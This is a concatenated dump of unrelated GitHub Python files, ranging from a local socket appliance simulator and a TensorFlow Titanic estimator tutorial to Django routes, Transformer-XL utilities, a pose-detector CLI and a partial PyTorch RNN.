ending\n\n\n#--Network connection\n# host = \"0.0.0.0\"\nhost = \"localhost\"\nport = 10000\nLISTENER = socket.socket()\nLISTENER.bind((host, port))\nTIMEOUT = 65.0\n\n#--System Info\nDevices = [] # list of connected appliances\nN_Appliances = 2 # target number of appliances (hardcoded for simplicity right now)\nhistory = {} # historical data, indexed on timestamp\n\n#------------ end of global variables ---------------------\n\n\n#=========================================\n#============= Classes =============\n\n\nclass Device():\n\tdef __init__(self, connection):\n\t\tself.connection = connection\n\t\tself.is_connected = True\n\t\tself.type = \"undetermined\"\n\t\tself.ID = \"dev00\"\n\t\tself.getInfo()\n\t\t\n\tdef recieveMessage(self):\n\t\t'''\n\t\tWrapper for socket.recv() for internal use (within class)\n\t\t'''\n\t\tmessage = \"\"\n\t\ttry:\n\t\t\tmessage = self.connection.recv(512).decode()\n\t\t\tif not message:\n\t\t\t\tself.is_connected = False\n\t\t\t\tprint(\"--empty recv--\")\n\t\t\t\t\n\t\texcept Exception as ex:\n\t\t\tself.is_connected = False\n\t\t\tself.connection.close()\n\t\t\ttemplate = \"An exception of type [{0}] occured.\\nArguments:\\n {1!r}\"\n\t\t\tex_msg = template.format(type(ex).__name__, ex.args)\n\t\t\tprint(\"--><--\"*7)\n\t\t\tprint(ex_msg)\n\t\t\tprint(\"=-><-=\"*7)\n\t\t\tmessage = \"---EXCEPTION---\"\n\t\tmessage = message.rstrip(\"\\n\")\n\t\treturn message\n\t\t\n\tdef getInfo(self):\n\t\t'''\n\t\tRun during constructor to retrieve device information\n\t\t'''\n\t\tM = \"getInfo\"\n\t\tself.connection.send(M.encode()) #socket_send\n\t\tinfostring = self.recieveMessage()\n\t\t# info = infostring.split(str=\";\")\n\t\tinfo = infostring.split(\";\")\n\t\tself.type = info[0]\n\t\tself.ID = info[1]\n\t\tself.type = self.type.strip()\n\t\tself.ID = self.ID.strip()\n\t\treturn\n\t\t\n\tdef getData(self):\n\t\t'''\n\t\trecieve message from Device,\n\t\treturn message as a string\n\t\t'''\n\t\tM = \"getData\"\n\t\tself.connection.send(M.encode()) #socket_send\n\t\tdatastring = self.recieveMessage()\n\t\t#--> should probably include some error checking here\n\t\treturn datastring.strip()\n#------------ end of Device() class -----------------------\n\n\nclass Snapshot():\n\tdef __init__(self, timestamp):\n\t\tself.time = timestamp\n\t\tself.data = {} # list/dict of recorded info at given timestamp\n\t\t\n\tdef add_data(self, Did, r):\n\t\tself.data[Did] = r # Did: Device ID, r: record (current state/power usage)\n\t\treturn\n\t\t\n\tdef __str__(self):\n\t\t'''format data as a string'''\n\t\tR = str(self.time)\n\t\tfor devID, rec in self.data.items():\n\t\t\tR += \" - {}:{}\".format(devID, rec)\n\t\treturn R\n\t\n\t\t\n#------------ end of class definition ---------------------\n\n\n#=========================================\n#============ Functions ============\n\ndef waitConnection():\n\t'''\n\tlisten for a client to connect, then accept connection\n\tReturn connected socket with a 60 sec timeout\n\treturn False if Exception occured\n\t'''\n\t# TIMEOUT = 65.0\n\ttry:\n\t\tprint(\"..listening..\", end=\" \")\n\t\tLISTENER.settimeout(TIMEOUT)\n\t\tLISTENER.listen(5)\n\t\tprint(\" .. ..\")\n\t\tc, addr = LISTENER.accept()\n\t\tprint(\"__accepted__\")\n\texcept Exception as ex:\n\t\ttemplate = \"An exception of type [{0}] occured.\\nArguments:\\n {1!r}\"\n\t\tex_msg = template.format(type(ex).__name__, ex.args)\n\t\tprint(\"--><--\"*7)\n\t\tprint(ex_msg)\n\t\tprint(\"=-><-=\"*7)\n\t\treturn False\n\tc.settimeout(TIMEOUT)\n\tprint(\"timeout set to {:02}s\".format(TIMEOUT))\n\treturn c\n\n\ndef my_send(sock, M):\n\t'''\n\twrapper for socket's send function\n\t\n\tCurrently just prints message before appending EOL\n\tCan be expanded to check syntax, etc\n\t'''\n\tprint(\"<<< [{}]\".format(M))\n\t\n\tif M == \"\":\n\t\tprint(\"--< (sending empty message...)\")\n\t\tM += \"\\n\"\n\telif M[-1] == \"\\n\":\n\t\tprint(\"--< already appended\")\n\telse:\n\t\tM += \"\\n\"\n\tsock.send(M.encode()) #socket_send\n\treturn\n\n\ndef tunnel(A, msg):\n\t'''recieve msg from A, save info to database, send msg to all other connections'''\n\treturn\n#------------ end of function definition ------------------\n\n\n#=========================================\n#=========== begin MAIN ============\n\n#-----------------------------------------\n#- Connect to Appliances\nprint(\"\\n--------------------------------------------------\\n\")\nbackup = 0\nwhile len(Devices) < N_Appliances:\n\tbackup += 1\n\tif backup > (N_Appliances*2): break\n\t#-connect via waitConnection()\n\tconn_sock = waitConnection()\n\tif not conn_sock:\n\t\tprint(\"--no connection--\")\n\t\t#-device never connected\n\t\tcontinue\n\t\t\n\tnewDevice = Device(conn_sock)\n\t# newDevice.getInfo()\n\t#--> check Device.ID for uniqueness\n\t\n\tDevices.append(newDevice)\n\t\n\t#--> send list of currently connected appliances\n\t#--> send new connection info to currently connected appliances\n\t#--> ... actually, just let Device connect to Sim, and let Sim handle all communications\n\nprint(\"--------------------------------------------------\")\n\n\n#-----------------------------------------\n#- Run simulation\n\nminutes = 0\nwhile RUN_SIM:\n\tT = time.time()\n\ttmp_S = Snapshot(T)\n\t#-retrieve data from Devices\n\tfor D in Devices:\n\t\ttmp_S.add_data(D.ID, D.getData())\n\t\t#--> send data to each other Device\n\t#-save data\n\thistory[T] = tmp_S\n\tminutes += 1\n\tprint(\"saved data #{}\".format(minutes))\n\t\n\t#--> should modify RUN_SIM somewhere to prevent infinite loop...\n\tif minutes > SIM_LENGTH : break\n\ttime.sleep(6)\n\n#=========================================\n\n\n#-----------------------------------------\n#- Print results\n\nprint(\"--------------------------------------------------\")\nfor S in history:\n\tprint(history[S])\n\t\nprint(\"--------------------------------------------------\")\n\n\ntime.sleep(5)\nany_key = input(\"enter any key to exit\")\n\nprint(\"you chose the [{}] 'key'\".format(any_key))\n\n## end program\n\n\n\n#-----------------------------------------\n#- ToDo\n'''\n\nadd print() function for history{} ... and somewhere in the program to print/record the data\n\n\nnotes:\n- the record/snapshot/whatever data is being stored could use some consistency, if not some improvement.\n\n\n'''\n\n\n","repo_name":"tbrown5238/cs402-team5","sub_path":"rough_sketch_v0/System_Sim.py","file_name":"System_Sim.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"958954000","text":"import numpy as np\nimport matplotlib.pylab as mpl\nfrom scipy.integrate import odeint\nimport sys\n\ndef s(x, z, omega_m, omega_k, Lambda):\n\ts = x[0]\n\tdsdz = np.sqrt(omega_m*(1 + z)**3 + omega_k*(1 + z)**2 + Lambda)/np.sqrt(omega_m*(1 + z)*(1./s) + omega_k + Lambda*s**2/(1 + z)**2)\n\n\treturn dsdz\n\n\ndef s_a(x, a, omega_m, omega_k, Lambda, a0):\n\ts = x[0]\n\tdsda = np.sqrt(omega_m/a0**3/s + omega_k/a0**2 + Lambda/3.*s**2)/np.sqrt(a**2*(omega_m/a**3 + omega_k/a**2 + Lambda/3.))\n\n\treturn dsda\n\nN = 10000\na0 = 1.65e-5\n\nz = np.linspace(20, 0, N)\n\na = np.linspace(a0, 1, N)\n\nLambda = float(sys.argv[1])\n\nOmega_m0_min = 1.0\nOmega_m0_max = float(sys.argv[2])\nn=11\n\nOmega_m0 = np.linspace(Omega_m0_min, Omega_m0_max, n)\n\nif len(sys.argv) == 3:\n\tOmega_K = 1 - Omega_m0 - Lambda\nelse:\n\tOmega_K = np.zeros(n)\n\tfor j in range(n):\n\t\tOmega_K[j] = float(sys.argv[3])\n\nomega = Omega_K + Omega_m0 + Lambda\n\ns0 = 0.5\n\n#result = odeint(s, s0, z, args=(Lambda, Omega_m0, Omega_K))\n\n\nfor i in range(len(Omega_m0)):\n\tsofa = odeint(s_a, s0, a, args = (Omega_m0[i], Omega_K[i], Lambda, a0))\n\n\tmpl.plot(a, sofa, linewidth = 0.75, label = r\"s, $\\Omega_{m0} =$ %.1f\" % Omega_m0[i])\n\tmpl.xlabel(\"a(t)\")\n\tmpl.ylabel(\"s(a)\")\n\tmpl.legend()\n\tmpl.yscale(\"log\")\n\tmpl.xscale(\"log\")\n\n\nmpl.show()","repo_name":"mrnafstad/Master","sub_path":"Kode/2DEradius.py","file_name":"2DEradius.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17657500325","text":"from soxs.background import \\\n BackgroundSpectrum, \\\n ConvolvedBackgroundSpectrum, \\\n make_point_sources_file, \\\n make_point_source_list, \\\n InstrumentalBackground\n\nfrom soxs.cosmology import \\\n make_cosmological_sources_file\n\nfrom soxs.events import \\\n write_spectrum, \\\n write_image, \\\n write_radial_profile, \\\n plot_spectrum, \\\n make_exposure_map, \\\n plot_image\n\nfrom soxs.instrument import \\\n instrument_simulator, \\\n make_background_file, \\\n simulate_spectrum\n\nfrom soxs.instrument_registry import \\\n add_instrument_to_registry, \\\n show_instrument_registry, \\\n write_instrument_json, \\\n get_instrument_from_registry, \\\n instrument_registry, \\\n make_simple_instrument\n\nfrom soxs.mosaic import \\\n make_mosaic_events, \\\n make_mosaic_image\n\nfrom soxs.response import \\\n AuxiliaryResponseFile, \\\n RedistributionMatrixFile, \\\n FlatResponse\n\nfrom soxs.simput import \\\n read_simput_catalog, \\\n SimputPhotonList, \\\n SimputCatalog, \\\n SimputSpectrum, \\\n write_photon_list\n\nfrom soxs.spatial import \\\n PointSourceModel, \\\n RadialFunctionModel, \\\n RadialArrayModel, \\\n RadialFileModel, \\\n AnnulusModel, \\\n BetaModel, \\\n DoubleBetaModel, \\\n FillFOVModel, \\\n RectangleModel, \\\n SpatialModel\n\nfrom soxs.spectra import \\\n Spectrum, \\\n ApecGenerator, \\\n ConvolvedSpectrum\n\nfrom soxs.utils import soxs_cfg\n\n__version__ = \"3.0.2\"","repo_name":"daya135k/jzuhonev","sub_path":"soxs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4767652477","text":"from argparse import ArgumentParser\n\n\nclass ArgsParserType(object):\n MODEL_TRAINING = \"training\"\n\n\nclass ArgsParserFactory(object):\n\n @staticmethod\n def create_parser(parser_type):\n parser = ArgumentParser(description='DeepNormalize Training')\n parser.add_argument(\"--use-amp\", dest=\"use_amp\", action=\"store_true\", default=False)\n parser.add_argument(\"--amp-opt-level\", dest=\"amp_opt_level\", type=str, default=\"O1\",\n help=\"O0 - FP32 training, O1 - Mixed Precision (recommended), O2 - Almost FP16 Mixed Precision, O3 - FP16 Training.\")\n parser.add_argument(\"--num-workers\", dest=\"num_workers\", default=4, type=int,\n help=\"Number of data loading workers for each dataloader object (default: 2).\")\n parser.add_argument(\"--local_rank\", dest=\"local_rank\", default=0, type=int, help=\"The local_rank of the GPU.\")\n\n if parser_type is ArgsParserType.MODEL_TRAINING:\n parser.add_argument(\"--config-file\", dest=\"config_file\", required=True)\n return parser\n","repo_name":"sami-ets/DeepNormalize","sub_path":"deepNormalize/config/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3719582681","text":"from django.contrib import admin\nfrom django.urls import path\nfrom mywed import views\n\n\nurlpatterns = [\n\n path('', views.index, name='index'),\n path('index_user', views.index_user, name='index_user'),\n path('admin/', admin.site.urls),\n path('animal', views.animal, name='animal'),\n path('animal_user', views.animal_user, name='animal_user'),\n path('add_animal', views.add_animal, name='add_animal'),\n path('login', views.login_user, name='login'),\n path('logout', views.logout_user, name='logout'),\n path('register', views.register, name='register'),\n path('allanimal',views.allanimal, name='allanimal'),\n\n #path('Upload', views.Upload),\n]\n","repo_name":"Tanung/pythonanywhere","sub_path":"Mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759034194","text":"'''\n------------------------------------------------------------------------------------------\nestimator\n Build a linear model with Estimators\n\nOverview\nThis end-to-end walkthrough trains a logistic regression model using the tf.estimator API. \nThe model is often used as a baseline for other, more complex, algorithms.\n------------------------------------------------------------------------------------------\n'''\n# common library\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport time\nimport os\nimport sys\nimport platform\nimport shutil\nimport subprocess\nimport random\nimport datetime\nfrom pathlib import Path\nfrom packaging import version\nfrom PIL import Image\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\n\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import roc_curve\n\nimport tensorflow as tf\n\nprint(__doc__)\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\npd.options.display.max_rows = None\n\n# Display current path\nbasic_path = Path.cwd()\nPROJECT_ROOT_DIR = basic_path.joinpath('Python', 'Normal', 'tensorflow')\nprint('PROJECT_ROOT_DIR = \\n{0}\\n'.format(PROJECT_ROOT_DIR))\n\n# Display tensorflow version\nprint(\"TensorFlow version: \", tf.version.VERSION)\nassert version.parse(tf.version.VERSION).release[0] >= 2, \\\n\"This notebook requires TensorFlow 2.0 or above.\"\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Load the titanic dataset \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n--------------------------------------------------------------------------------------------------------------\nYou will use the Titanic dataset with the (rather morbid) goal of predicting passenger survival, given characteristics \nsuch as gender, age, class, etc.\n--------------------------------------------------------------------------------------------------------------\n'''\n\n# Load dataset.\ndftrain = pd.read_csv('https://storage.googleapis.com/tf-datasets/titanic/train.csv')\ndfeval = pd.read_csv('https://storage.googleapis.com/tf-datasets/titanic/eval.csv')\ny_train = dftrain.pop('survived')\ny_eval = dfeval.pop('survived')\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Load the titanic dataset \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nThe dataset contains the following features\n---------------------------------------------------------------------------------------------------------------\n'''\n\nprint('dftrain.head() = \\n{0}\\n'.format(dftrain.head()))\n\nprint('dftrain.describe() = \\n{0}\\n'.format(dftrain.describe()))\n\n'''\n--------------------------------------------------------------------------------------------------------------\nThere are 627 and 264 examples in the training and evaluation sets, respectively.\n--------------------------------------------------------------------------------------------------------------\n'''\n\nprint('(dftrain.shape[0] = {0}, dfeval.shape[0] = {1})\\n'.format(dftrain.shape[0], dfeval.shape[0]))\n\n# The majority of passengers are in their 20's and 30's.\ndftrain.age.hist(bins=20)\nplt.show()\n\n# There are approximately twice as many male passengers as female passengers aboard.\ndftrain.sex.value_counts().plot(kind='barh')\nplt.show()\n\n# The majority of passengers were in the \"third\" class.\ndftrain['class'].value_counts().plot(kind='barh')\nplt.show()\n\n# Females have a much higher chance of surviving versus males. \n# This is clearly a predictive feature for the model.\npd.concat([dftrain, y_train], axis=1).groupby('sex').survived.mean().plot(kind='barh').set_xlabel('% survive')\nplt.show()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Feature Engineering for the Model \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nEstimators use a system called feature columns to describe how the model should interpret each of the raw input features. \nAn Estimator expects a vector of numeric inputs, and feature columns describe how the model should convert each feature.\n\nSelecting and crafting the right set of feature columns is key to learning an effective model. \nA feature column can be either one of the raw inputs in the original features dict (a base feature column), \nor any new columns created using transformations defined over one or multiple base columns (a derived feature columns).\n\nThe linear estimator uses both numeric and categorical features. \nFeature columns work with all TensorFlow estimators and their purpose is to define the features used for modeling. \nAdditionally, they provide some feature engineering capabilities like one-hot-encoding, normalization, and bucketization.\n---------------------------------------------------------------------------------------------------------------\n'''\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' FBase Feature Columns \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nCATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck', 'embark_town', 'alone']\nNUMERIC_COLUMNS = ['age', 'fare']\n\nfeature_columns = []\nfor feature_name in CATEGORICAL_COLUMNS:\n vocabulary = dftrain[feature_name].unique()\n feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))\n\nfor feature_name in NUMERIC_COLUMNS:\n feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))\n\n'''\n---------------------------------------------------------------------------------------------------------------\nThe input_function specifies how data is converted to a tf.data.Dataset that feeds the input pipeline in a streaming fashion. \ntf.data.Dataset take take in multiple sources such as a dataframe, a csv-formatted file, and more.\n---------------------------------------------------------------------------------------------------------------\n'''\n\ndef make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):\n def input_function():\n ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df))\n if shuffle:\n ds = ds.shuffle(1000)\n \n ds = ds.batch(batch_size).repeat(num_epochs)\n return ds\n return input_function\n\ntrain_input_fn = make_input_fn(dftrain, y_train)\neval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False)\n\n# You can inspect the dataset:\nds = make_input_fn(dftrain, y_train, batch_size=10)()\nfor feature_batch, label_batch in ds.take(1):\n print('Some feature keys:', list(feature_batch.keys()))\n print()\n print('A batch of class:', feature_batch['class'].numpy())\n print()\n print('A batch of Labels:', label_batch.numpy())\n\n# You can also inspect the result of a specific feature column using the tf.keras.layers.DenseFeatures layer:\nage_column = feature_columns[7]\ntf.keras.layers.DenseFeatures([age_column])(feature_batch).numpy()\n\n'''\n------------------------------------------------------------------------------------------------------------\nDenseFeatures only accepts dense tensors, \nto inspect a categorical column you need to transform that to a indicator column first:\n------------------------------------------------------------------------------------------------------------\n'''\ngender_column = feature_columns[0]\ntf.keras.layers.DenseFeatures([tf.feature_column.indicator_column(gender_column)])(feature_batch).numpy()\n\n# After adding all the base features to the model, let's train the model. \n# Training a model is just a single command using the tf.estimator API:\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns)\nlinear_est.train(train_input_fn)\nresult = linear_est.evaluate(eval_input_fn)\n\nprint(result)\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n ' Derived Feature Columns \\n'\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\n'''\n---------------------------------------------------------------------------------------------------------------\nNow you reached an accuracy of 75%. \nUsing each base feature column separately may not be enough to explain the data. \nFor example, the correlation between gender and the label may be different for different gender. \nTherefore, if you only learn a single model weight for gender=\"Male\" and gender=\"Female\", \nyou won't capture every age-gender combination \n(e.g. distinguishing between gender=\"Male\" AND age=\"30\" AND gender=\"Male\" AND age=\"40\").\n\nTo learn the differences between different feature combinations, \nyou can add crossed feature columns to the model (you can also bucketize age column before the cross column):\n---------------------------------------------------------------------------------------------------------------\n'''\n\nage_x_gender = tf.feature_column.crossed_column(['age', 'sex'], hash_bucket_size=100)\n\n# After adding the combination feature to the model, let's train the model again:\nderived_feature_columns = [age_x_gender]\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns+derived_feature_columns)\nlinear_est.train(train_input_fn)\nresult = linear_est.evaluate(eval_input_fn)\n\nprint(result)\n\n'''\n--------------------------------------------------------------------------------------------------------------\nIt now achieves an accuracy of 77.6%, which is slightly better than only trained in base features. \nYou can try using more features and transformations to see if you can do better!\n\nNow you can use the train model to make predictions on a passenger from the evaluation set. \nTensorFlow models are optimized to make predictions on a batch, or collection, of examples at once. \nEarlier, the eval_input_fn was defined using the entire evaluation set.\n--------------------------------------------------------------------------------------------------------------\n'''\n\npred_dicts = list(linear_est.predict(eval_input_fn))\nprobs = pd.Series([pred['probabilities'][1] for pred in pred_dicts])\n\nprobs.plot(kind='hist', bins=20, title='predicted probabilities')\nplt.show()\n\n'''\n-------------------------------------------------------------------------------------------------------------\nFinally, look at the receiver operating characteristic (ROC) of the results, \nwhich will give us a better idea of the tradeoff between the true positive rate and false positive rate.\n-------------------------------------------------------------------------------------------------------------\n'''\n\nfpr, tpr, _ = roc_curve(y_eval, probs)\nplt.plot(fpr, tpr)\nplt.title('ROC curve')\nplt.xlabel('false positive rate')\nplt.ylabel('true positive rate')\nplt.xlim(0,)\nplt.ylim(0,)\nplt.show()\n\ndata_today = datetime.date.today()\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\n\nprint(\n ' finished estimator_linear_model.py ({0}) \\n'.format(data_today)\n )\n\nprint (\n '------------------------------------------------------------------------------------------------------\\n'\n )\nprint()\nprint()\nprint()","repo_name":"munezou/VsCodeProject","sub_path":"Python/Normal/tensorflow/estimator_linear_model.py","file_name":"estimator_linear_model.py","file_ext":"py","file_size_in_byte":12300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18753715674","text":"import argparse\nfrom pathlib import Path\n\nimport pose_detector.generation.generator as generator\nimport pose_detector.training.training as training\nimport pose_detector.benchmark.benchmark as benchmark\nimport pose_detector.serving.serving as serving\nimport pose_detector.utility.utility as utility\n\n\ndef main():\n \"\"\"The entry point of pose-detector\n \"\"\"\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n datagen_parser = subparsers.add_parser(\"generate\",\n help=\"Create a dataset by rendering images using blender and applying \"\n \"post processing\",\n description=\"\"\"Create a dataset by rendering images using blender and \n applying post processing.\n \n The Blenderproc pipeline is used to simplify and speed up the rendering \n process in Blender. A config file for this tool must be provided. This \n tool needs some specific Blenderproc modules to achieve the correct output \n for further processing. It is highly recommended to use the provided \n config template file `resources/template.yaml`. \n\n By adding modules to the config you can modify the rendered images in any \n way you want.\"\"\")\n datagen_parser.add_argument(\"config_path\", type=Path, metavar=\"config\",\n help=\"Path to the configuration file for BlenderProc\")\n datagen_parser.add_argument(\"models_path\", type=Path, metavar=\"models\",\n help=\"Path to the directory containing the models as individual .blend files\")\n datagen_parser.add_argument(\"backgrounds_path\", type=Path, metavar=\"backgrounds\",\n help=\"Path of the directory containing background images\")\n datagen_parser.add_argument(\"output_path\", type=Path, metavar=\"output\",\n help=\"Path to the directory where the images should be stored\")\n datagen_parser.add_argument(\"--mode\", type=str, default=\"all\", choices=[\"all\", \"render\", \"process\"],\n help=\"Only perform one step of the generation\")\n datagen_parser.add_argument(\"--size\", \"-s\", type=int, default=10,\n help=\"The target size of the dataset to be generated, this might vary by a few images \"\n \"depending on the number of models and parallelization\")\n datagen_parser.add_argument(\"--parallel\", \"-p\", type=int, default=1,\n help=\"How many process to use in parallel for rending the images\")\n datagen_parser.set_defaults(func=generator.generate_dataset)\n\n train_parser = subparsers.add_parser(\"train\",\n help=\"Train a CNN using a previously created dataset.\",\n description=\"\"\"Train a CNN using a previously created dataset.\n \n This uses transfer learning on the `resnet18` model pretrained on the \n `imagenet` dataset. It tries to predict the value encoded in the image name \n created by the generation step. It will train for 20 epochs and then save \n the generated model.\n \"\"\")\n train_parser.add_argument(\"images_directory\", type=Path, metavar=\"dataset\",\n help=\"Path to the directory where the dataset is stored\")\n train_parser.add_argument(\"save_path\", type=Path, metavar=\"output\",\n help=\"Path where the trained model should be saved to\")\n train_parser.set_defaults(func=training.run)\n\n benchmark_parser = subparsers.add_parser(\"benchmark\",\n help=\"Perform a benchmark using a model that is being served with the \"\n \"'serve' command\",\n description=\"Perform a benchmark using a model that is being served with \"\n \"the 'serve' command\")\n benchmark_parser.add_argument(\"input_img_path\", type=Path, metavar=\"image\",\n help=\"Path of an image to use for benchmarking, must be 128x128 pixels\")\n benchmark_parser.set_defaults(func=benchmark.run)\n\n serve_parser = subparsers.add_parser(\"serve\",\n help=\"Serve a saved model using the tensorflow/serving docker container.\",\n description=\"Serve a saved model using the tensorflow/serving docker container.\")\n serve_parser.add_argument(\"model_path\", type=Path, metavar=\"model\",\n help=\"Path to the saved model to be served, must be absolute\")\n serve_parser.set_defaults(func=serving.run)\n\n visualize_parser = subparsers.add_parser(\"visualize\",\n help=\"Create a collage of images including the labels.\",\n description=\"Create a collage of images including the labels.\")\n visualize_parser.add_argument(\"images_directory\", type=Path, metavar=\"images\",\n help=\"Path to the directory where the images are stored\")\n visualize_parser.add_argument(\"save_path\", type=Path, metavar=\"output\",\n help=\"Path where the image should be saved to\")\n visualize_parser.set_defaults(func=utility.visualize_dataset)\n\n args = parser.parse_args()\n\n if \"func\" not in args:\n parser.print_help()\n else:\n args_dict = vars(args)\n func = args_dict.pop(\"func\")\n func(**args_dict)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GeorgSchenzel/pose-detector","sub_path":"src/pose_detector/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75255254248","text":"\"\"\"Defines utility functions.\"\"\"\nimport tensorflow as tf\n\n\ndef get_positional_encoding(batch_size, seq_len, hidden_size, reverse=False):\n \"\"\"Creates a tensor that encodes positional information.\n\n Args:\n batch_size: int scalar tensor, batch size. \n seq_len: int scalar tensor, sequence length.\n hidden_size: int scalar, the hidden size of continuous representation.\n reverse: bool, whether to reverse the sequence. Defaults to False.\n\n Returns:\n positional_encoding: float tensor of shape [batch_size, seq_len, hidden_size], the \n tensor that encodes positional information.\n \"\"\"\n distances = tf.cast(tf.range(seq_len), 'float32')\n if reverse:\n distances = distances[::-1]\n inverse_frequencies = 1 / (10000 ** (tf.range(0, hidden_size, 2.0) /\n hidden_size))\n positional_encoding = tf.einsum('i,j->ij', distances, inverse_frequencies)\n positional_encoding = tf.concat([tf.sin(positional_encoding),\n tf.cos(positional_encoding)], axis=1)\n positional_encoding = tf.tile(positional_encoding[tf.newaxis], [batch_size, 1, 1])\n return positional_encoding\n\n\ndef get_look_ahead_mask(q_seq_len, m_seq_len):\n \"\"\"Creates a tensor to mask out future tokens that should not be attended to.\n\n Given query sequence of length `q_seq_len`, and memory sequence of length\n `m_seq_len`, the mask would be a `q_seq_len x (m_seq_len + q_seq_len)` matrix\n that looks like this:\n\n 0, ... | 0, 1, 1, ..., 1 \n 0, ... | 0, 0, 1, ..., 1\n\n ... ...\n\n 0, ... | 0, 0, 0, ..., 1\n 0, ... | 0, 0, 0, ..., 0\n\n where the submatrix to the left of `|` corresponds to the memory sequence, \n while the submatrix to the right corresponds to the query sequence.\n\n Args:\n q_seq_len: int scalar tensor, query sequence length.\n m_seq_len: int scalar tensor, memory sequence length.\n\n Returns:\n look_ahead_mask: float tensor of shape [1, 1, q_seq_len, \n m_seq_len + q_seq_len].\n \"\"\"\n mask = tf.ones([q_seq_len, q_seq_len])\n mask_u = tf.linalg.band_part(mask, 0, -1)\n mask_dia = tf.linalg.band_part(mask, 0, 0)\n mask_pad = tf.zeros([q_seq_len, m_seq_len])\n look_ahead_mask = tf.concat([mask_pad, mask_u - mask_dia], 1)\n look_ahead_mask = look_ahead_mask[tf.newaxis, tf.newaxis, :, :]\n return look_ahead_mask\n\n\ndef cache_memory(memory, inputs, m_seq_len=None):\n \"\"\"Cache the memory for the next segment.\n\n Args:\n memory: float tensor of shape [batch_size, m_seq_len, hidden_size], memory\n for the current segment.\n inputs: float tensor of shape [batch_size, q_seq_len, hidden_size], \n input sequences.\n m_seq_len: int scalar, num of time steps to be cached.\n\n Returns:\n new_memory: float tensor of shape [batch_size, m_seq_len, hidden_size],\n memory cached for the next segment.\n \"\"\"\n if m_seq_len is None:\n m_seq_len = tf.shape(memory)[1]\n new_memory = tf.stop_gradient(\n tf.concat([memory, inputs], axis=1)[:, -m_seq_len:])\n return new_memory\n","repo_name":"chao-ji/tf-transformerxl-language-model","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20052549894","text":"'''You are given an alphanumeric string s. (Alphanumeric string is a string consisting of lowercase English letters and digits).\n\nYou have to find a permutation of the string where no letter is followed by another letter and no digit is followed by another digit. That is, no two adjacent characters have the same type.\n\nReturn the reformatted string or return an empty string if it is impossible to reformat the string.\n\nExample 1:\n\nInput: s = \"a0b1c2\"\nOutput: \"0a1b2c\"\nExplanation: No two adjacent characters have the same type in \"0a1b2c\". \"a0b1c2\", \"0a1b2c\", \"0c2a1b\" are also valid permutations.'''\n\n# TC = O(n)\ndef reformat(self, s: str) -> str:\n a = [c for c in s if c.isalpha()]\n b = [c for c in s if c.isdigit()]\n if len(a) < len(b): a, b = b, a\n if len(a) - len(b) > 1: return \"\"\n \n rv = []\n while a:\n rv.append(a.pop())\n if b: rv.append(b.pop())\n return rv\n ","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"String/Easy/Reformat The String.py","file_name":"Reformat The String.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20840924225","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torch.nn.functional as F\n\nimport utilities as u\n\n\nclass BaselineRNN(nn.Module):\n '''\n Model to produce kinematics to reach to a randomly placed target.\n\n '''\n\n def __init__(self, inp_size=3, n_neurons=128, out_size=6, rnn_nonlinearity = 'relu',dropout_p=.3):\n '''\n Initialize layers to reuse during each timestep\n\n ----------\n Parameters\n ----------\n inp_size : int\n number of input timeseries, defaults to 3 (target x, target y, go cue)\n n_neurons : int\n number of neurons in each hidden layers\n\n '''\n super(BaselineRNN, self).__init__()\n\n\n\n # input -> ReLU RNN -> Dropout ->Linear -> ReLU -> Linear -> 